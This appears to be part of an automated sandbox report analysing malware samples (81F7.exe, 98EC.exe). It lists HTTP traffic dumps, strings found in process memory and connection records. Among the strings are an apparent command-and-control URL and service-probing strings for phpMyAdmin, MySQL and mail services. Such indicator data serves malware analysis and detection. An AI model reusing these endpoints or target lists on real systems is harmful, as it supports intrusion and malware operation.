Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-149.ec2.internalX-Request-Id: cd959ca4-5528-4026-9114-d8c052c43d6cData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.1Date: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 37 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 fa 86 7a 46 86 7a 26 7a 86 c8 0a f5 61 46 eb 43 9d 05 00 40 53 92 9a 9f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 78(HML),I310Q/Qp/K&T$dCAfAyyE%zFz&zaFC@S0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 20 Feb 2024 23:26:16 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Tue, 20 Feb 2024 23:26:17 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df

Source: explorer.exe, 00000002.00000000.2127636524.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2127636524.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2127636524.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2127636524.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2127636524.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2124427581.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126374091.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2126384972.0000000007B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2129960149.000000000C354000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 81F7.exe, 0000000A.00000002.4694369235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 81F7.exe, 0000000A.00000002.4694369235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
Source: 81F7.exe, 0000000A.00000002.4694369235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
Source: explorer.exe, 00000002.00000000.2128030306.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.2129960149.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2127636524.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2127636524.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2127636524.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.2127636524.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000002.00000000.2129960149.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000002.00000000.2129960149.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000002.00000000.2129960149.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: 98EC.exe	String found in binary or memory: https://resergvearyinitiani.shop/
Source: 98EC.exe	String found in binary or memory: https://resergvearyinitiani.shop/api
Source: 81F7.exe, 0000000A.00000003.3901322926.0000000003ABA000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3891547637.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3920241888.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3925907776.0000000003155000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3910095776.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3892083236.0000000003821000.00000004.00000020.00020000.00000000.sdmp, 81F7.exe, 0000000A.00000003.3913233315.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2128030306.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000002.00000000.2129960149.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000002.00000000.2125784625.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: 81F7.exe, 0000000A.00000002.4694369235.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51824
Source: unknown	Network traffic detected: HTTP traffic on port 57680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51827
Source: unknown	Network traffic detected: HTTP traffic on port 63325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51820
Source: unknown	Network traffic detected: HTTP traffic on port 59781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56046
Source: unknown	Network traffic detected: HTTP traffic on port 60815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60539
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 52186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 63051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58469
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57383
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 64972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61874
Source: unknown	Network traffic detected: HTTP traffic on port 52735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50754
Source: unknown	Network traffic detected: HTTP traffic on port 62183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51848
Source: unknown	Network traffic detected: HTTP traffic on port 57772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59336
Source: unknown	Network traffic detected: HTTP traffic on port 58020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 59642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 60884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 58353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51612
Source: unknown	Network traffic detected: HTTP traffic on port 59333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51853
Source: unknown	Network traffic detected: HTTP traffic on port 63908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59582
Source: unknown	Network traffic detected: HTTP traffic on port 52667 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 51090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57161
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49546
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50932
Source: unknown	Network traffic detected: HTTP traffic on port 60905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65196
Source: unknown	Network traffic detected: HTTP traffic on port 62345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50462 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58413
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57332
Source: unknown	Network traffic detected: HTTP traffic on port 60840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56240
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65189
Source: unknown	Network traffic detected: HTTP traffic on port 56057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 58273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50947
Source: unknown	Network traffic detected: HTTP traffic on port 56229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59515
Source: unknown	Network traffic detected: HTTP traffic on port 51882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60744
Source: unknown	Network traffic detected: HTTP traffic on port 57200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62939
Source: unknown	Network traffic detected: HTTP traffic on port 60747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59525
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61602
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54083
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50968
Source: unknown	Network traffic detected: HTTP traffic on port 64663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 64745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56026
Source: unknown	Network traffic detected: HTTP traffic on port 57796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49373 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59781
Source: unknown	Network traffic detected: HTTP traffic on port 59700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61477 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61610
Source: unknown	Network traffic detected: HTTP traffic on port 52246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62557
Source: unknown	Network traffic detected: HTTP traffic on port 56695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59397
Source: unknown	Network traffic detected: HTTP traffic on port 60234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59152
Source: unknown	Network traffic detected: HTTP traffic on port 56162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58062
Source: unknown	Network traffic detected: HTTP traffic on port 58326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57276 -> 443
